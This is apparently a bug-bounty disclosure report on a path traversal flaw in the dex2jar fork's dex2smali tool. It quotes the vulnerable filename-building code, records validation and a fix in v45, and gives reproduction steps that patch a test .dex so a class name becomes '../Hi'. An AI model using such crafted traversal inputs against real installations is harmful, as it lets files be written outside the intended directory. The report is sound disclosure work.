Relative Path Traversal in thexxturboxx/dex2jar

Valid

Reported on

Feb 14th 2022

Description

This vulnerability is originally reported to pxb1988/dex2jar, but re-sending it again for maintained fork repository as requested.
dex2jar is a set of tools to work with android .dex and java .class files.
In these tools, there is a tool called "dex2smali", and this tool allows a malicious .dex to overwrite arbitrary .smali files on the system.

In com.googlecode.d2j.smali.baksmalidexfilevisitor.java of d2j-smali, the following code is used to determinate the output location of smali file. (Link)

                Path smaliFile = dir
                        .resolve(rebuildFileName(className.substring(1, className.length() - 1)) + ".smali");

As rebuildFileName isn't escaping / or . properly, it's possible to write arbitrary .smali files to outside of the output directory.

    protected String rebuildFileName(String s) {
        s = BaksmaliDumper.escapeId(s);
        s = s.replace('\\', '-');
        String low = s.toLowerCase();
        if (hases.contains(low)) {
            return s + "_d2j" + i++;
        } else {
            hases.add(low);
        }
        return s;
    }

Steps to reproduce

Patch based method:
1. Download dex2jar and extract it: https://github.com/pxb1988/dex2jar/releases/tag/v2.1
2. Download i200.dex from here: https://github.com/pxb1988/dex2jar/blob/d7a86110baba3f845973017021fb10664b1b90d2/dex-reader/src/test/resources/i200.dex
3. Install xxd and patch command if you don't have it in your machine.
4. Run xxd i200.dex > i200.txt.
5. Save the following file as diff.patch:

33c33
< 00000200: 0141 0001 4200 074c 612f 4475 703b 0015  .A..B..La/Dup;..
---
> 00000200: 0141 0001 4200 074c 2e2e 2f48 693b 0015  .A..B..L../Hi;..

6. Run patch i200.txt diff.patch
7. Run xxd -r i200.txt i200-edited.dex
8. Run d2j-dex2smali.sh i200-edited.dex.
9. Hi.smali will be written into the outside of i200-edited-out directory.

Binary editor method:
1. Download dex2jar and extract it: https://github.com/pxb1988/dex2jar/releases/tag/v2.1
2. Download i200.dex from here: https://github.com/pxb1988/dex2jar/blob/d7a86110baba3f845973017021fb10664b1b90d2/dex-reader/src/test/resources/i200.dex
3. Open it with the binary editor.
4. Replace a/Dup to ../Hi.
5. Save it.
6. Run d2j-dex2smali.sh i200.dex.
7. Hi.smali will be written into the outside of i200-out directory.

Impact

It's possible to overwrite arbitrary .smali files.

We are processing your report and will contact the thexxturboxx/dex2jar team within 24 hours. a year ago

Nico Mexis validated this vulnerability a year ago

RyotaK has been awarded the disclosure bounty

The fix bounty is now up for grabs

Nico Mexis marked this as fixed in v45 with commit d064c1 a year ago

Nico Mexis has been awarded the fix bounty

This vulnerability will not receive a CVE

Jamie Slome

commented a year ago

Admin

Nice work @ry0tak!

to join this conversation